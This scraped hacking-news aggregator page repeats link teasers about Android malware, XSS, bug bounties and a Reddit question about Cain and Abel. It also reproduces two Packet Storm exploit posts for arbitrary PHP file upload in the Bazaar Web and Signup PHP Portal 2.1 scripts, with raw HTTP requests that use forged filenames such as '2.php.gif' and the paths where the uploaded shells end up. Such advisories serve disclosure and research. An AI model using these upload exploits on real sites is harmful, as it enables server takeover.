Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
A new Joker malware app has been downloaded by over 500,000 Android users from the Google Play…
https://cdn-images-1.medium.com/max/1280/1*PFp0EKE_9nAZYoXLRAn21w.png
An android Malware application with over 500,000 installs from the Google Play app store has been discovered to be infected with malware…
Continue reading on Medium »
A new Joker malware app has been downloaded by over 500,000 Android users from the Google Play…
https://cdn-images-1.medium.com/max/1280/1*PFp0EKE_9nAZYoXLRAn21w.png
An android Malware application with over 500,000 installs from the Google Play app store has been discovered to be infected with malware…
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Cross-site Scripting
https://cdn-images-1.medium.com/max/1200/0*64hG6JV_YhJxnu9H
How to Detect and Exploit XSS Vulnerabilities
Continue reading on Medium »
Cross-site Scripting
https://cdn-images-1.medium.com/max/1200/0*64hG6JV_YhJxnu9H
How to Detect and Exploit XSS Vulnerabilities
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Cumplimiento de CISA para 2022
https://cdn-images-1.medium.com/max/1529/0*YE7ktr3nibNRndHH
PUBLICADO EN 20 DICIEMBRE, 2021POR DPAB
Continue reading on Medium »
Cumplimiento de CISA para 2022
https://cdn-images-1.medium.com/max/1529/0*YE7ktr3nibNRndHH
PUBLICADO EN 20 DICIEMBRE, 2021POR DPAB
Continue reading on Medium »
How I was able to reveal page admin of almost any page on Facebook
https://medium.com/pentesternepal/how-i-was-able-to-reveal-page-admin-of-almost-any-page-on-facebook-5a8d68253e0c?source=rss------bug_bounty-5
https://medium.com/pentesternepal/how-i-was-able-to-reveal-page-admin-of-almost-any-page-on-facebook-5a8d68253e0c?source=rss------bug_bounty-5
Hello there , I am Sudip Shah from Pokhara, Nepal(a 19 yo independent security researcher). I found a bug on Facebook for Android where I…Continue reading on Pentester Nepal » (https://medium.com/pentesternepal/how-i-was-able-to-reveal-page-admin-of-almost-any-page-on-facebook-5a8d68253e0c?source=rss------bug_bounty-5)
Public testing of BusyChain Testnet V2 is about to launch— bug-hunting!
https://medium.com/busytechnology/public-testing-of-busychain-testnet-is-about-to-launch-bug-hunting-7950b21d6c40?source=rss------bug_bounty-5
https://medium.com/busytechnology/public-testing-of-busychain-testnet-is-about-to-launch-bug-hunting-7950b21d6c40?source=rss------bug_bounty-5
Busy is happy to reveal the first long-awaited community testing event. The updated version of BusyChain testnet V2 goes public on 22nd…Continue reading on BusyTechnology » (https://medium.com/busytechnology/public-testing-of-busychain-testnet-is-about-to-launch-bug-hunting-7950b21d6c40?source=rss------bug_bounty-5)
hacking: security in practice
Cain and Abel in 2021?
I was 11 when I started hacking. I really got into it when I was 13 or 14, and I remember at the time Cain and Abel was the magic tool for hacking.
It had a lot of stuff in it. I never ended up using it much, but I personally believe it has a place in the hall of fame.
All these years later, hacking has progressed so far. I’m wondering how practical and useful Cain and Abel would be in 2021? I’m not asking IF I should use it, because I probably won’t. But hypothetically, how useful would it be today? Do any of the features still work? Are they still practical?
submitted by /u/fantasmafuemiclave
[link] [comments]
Cain and Abel in 2021?
I was 11 when I started hacking. I really got into it when I was 13 or 14, and I remember at the time Cain and Abel was the magic tool for hacking.
It had a lot of stuff in it. I never ended up using it much, but I personally believe it has a place in the hall of fame.
All these years later, hacking has progressed so far. I’m wondering how practical and useful Cain and Abel would be in 2021? I’m not asking IF I should use it, because I probably won’t. But hypothetically, how useful would it be today? Do any of the features still work? Are they still practical?
submitted by /u/fantasmafuemiclave
[link] [comments]
reddit
Cain and Abel in 2021?
I was 11 when I started hacking. I really got into it when I was 13 or 14, and I remember at the time Cain and Abel was the magic tool for...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Bazaar Web PHP Social Listings Shell Upload
https://1.bp.blogspot.com/-f08tQl4ET7w/WWlvRxSI6FI/AAAAAAAAINU/PQjq5zhIC6AFgb3OPDnJIpwa9KgUsaunwCLcBGAs/s1600/h37.png
Bazaar Web PHP Social Listings suffers from a remote shell upload vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
Bazaar Web PHP Social Listings Shell Upload
https://1.bp.blogspot.com/-f08tQl4ET7w/WWlvRxSI6FI/AAAAAAAAINU/PQjq5zhIC6AFgb3OPDnJIpwa9KgUsaunwCLcBGAs/s1600/h37.png
Bazaar Web PHP Social Listings suffers from a remote shell upload vulnerability.
MD5 |
332c8c67d69bd164ce7cf1a517267229Download
# Exploit Title: Bazaar Web PHP Social Listings Arbitrary File Upload
# Google Dork: N/A
# Date: 19/12/2021
# Exploit Author: Sohel Yousef - sohel.yousef@yandex.com
# Software Link: https://codecanyon.net/item/bazaar-social-listing-shopping-web-php-template/23207913
# Software Demo :https://xserver.app/__apps/bazaar-web/index.php#
# Category: webapps
1. Description
Bazaar Web PHP Social Listings script contain arbitrary file upload
registered user can upload .php files in Edit an item section without
any security
list item link :
localhost bazaar-web/list-item-info.php
edit item photos and upload php files and inspect element your php
direction
uploaded file direction
local host bazaar/uploads/yourfile.php
just right click the photo and use inspect element you will have your
direction
Host: (HOST)
Accept: */*
Accept-Language: ar,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------47450779111254302601850437199
Content-Length: 63132
Connection: keep-alive
Referer: https:/localhost/bazaar-web/list-item-info.php?itemID=uT8aeJcTu5
Cookie: AWSALB=BOOAELkwd/6yNqpv36ou/NXmOgXJcpsfK+qMH36RZwhotfk/zd8hoyDpbc2Qt4nwl1mw8CBJm0bJTwoci7kY6kAfwutcXuxjFCKoSPXqis2mMnE1ab8qwGquZOYI; AWSALBCORS=BOOAELkwd/6yNqpv36ou/NXmOgXJcpsfK+qMH36RZwhotfk/zd8hoyDpbc2Qt4nwl1mw8CBJm0bJTwoci7kY6kAfwutcXuxjFCKoSPXqis2mMnE1ab8qwGquZOYI; PHPSESSID=o0it0cquadspsgh864fr4mvtrt
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
file=fx.php&fileName=fx.php
GET
https://localhost/bazaar/uploads/pZ2CGSkezbiDprchqpZ7_fx.php
Host: HOST
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: image/avif,image/webp,*/*
Accept-Language: ar,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://localhost/bazaar-web/list-item-info.php?itemID=uT8aeJcTu5
Cookie: AWSALB=Zl/BPrqEgbVqCknGhgr3fTBKhe+vxhq2WkKOn6NZEvstF659/bY85gK5a9rehQC9ejX8mXIhp/F5HoMd7iiNXUs0PKBGysX6kGrjeS2ZnnmHHfe6wwZNqWYQbbRx; AWSALBCORS=Zl/BPrqEgbVqCknGhgr3fTBKhe+vxhq2WkKOn6NZEvstF659/bY85gK5a9rehQC9ejX8mXIhp/F5HoMd7iiNXUs0PKBGysX6kGrjeS2ZnnmHHfe6wwZNqWYQbbRx; PHPSESSID=o0it0cquadspsgh864fr4mvtrt
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
#####
-->
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Signup PHP Portal 2.1 Shell Upload
https://2.bp.blogspot.com/-U4x-65bW3GQ/WWlvNN9osvI/AAAAAAAAIMY/h5EIQTz5wbsbDMf6z0LfMa0yML4cI035gCLcBGAs/s1600/h21.png
Signup PHP Portal version 2.1 suffers from a remote shell upload vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
Signup PHP Portal 2.1 Shell Upload
https://2.bp.blogspot.com/-U4x-65bW3GQ/WWlvNN9osvI/AAAAAAAAIMY/h5EIQTz5wbsbDMf6z0LfMa0yML4cI035gCLcBGAs/s1600/h21.png
Signup PHP Portal version 2.1 suffers from a remote shell upload vulnerability.
MD5 |
e464561cff8e90dcfa451a5ce5f9f8d5Download
# Exploit Title: Signup Php Portal Arbitrary File Upload
# Google Dork: N/A
# Date: 19/12/2021
# Exploit Author: Sohel Yousef - sohel.yousef@yandex.com
# Software Link: https://codecanyon.net/item/signup-php-portal/23066564
# Software Demo :https://ocsolutions.co.in/signup_custom_script/customer_register.php
# Category: webapps
# Version: 2.1
1. Description
Signup Php Portal script contain arbitrary file upload
using the form you can upload php files and bypass secuirty with burb suite intercept tool
signup link :
https://localhost/signup_custom_script/customer_register.php
in the section of other images upload your file.php.gif and use intercept tool in burbsuite to edit the raw
details
POST /signup_custom_script/upload.php HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: ar,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------232155580731505179933631361962
Content-Length: 294712
Origin: https://localhost
Connection: close
Referer: https://localhost/signup_custom_script/customer_register.php
Cookie: language=en-gb; currency=GBP; PHPSESSID=055209d5effdb7d44487349cbd66243e
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------232155580731505179933631361962
Content-Disposition: form-data; name="name"
p1fna9ivqhk6g1fbjqto1f711ooq9.gif <-------
-----------------------------232155580731505179933631361962
Content-Disposition: form-data; name="file"; filename="2.php.gif" <-------
Content-Type: image/gif
#####
forward and all done
your file name will be
p1fna9ivqhk6g1fbjqto1f711ooq9.php
and this is the upload dir
https://localhost//signup_custom_script/uploads/
your file will be on this link
https://localhost//signup_custom_script/uploads/p1fna9ivqhk6g1fbjqto1f711ooq9.php
-->
Source:packetstormsecurity.com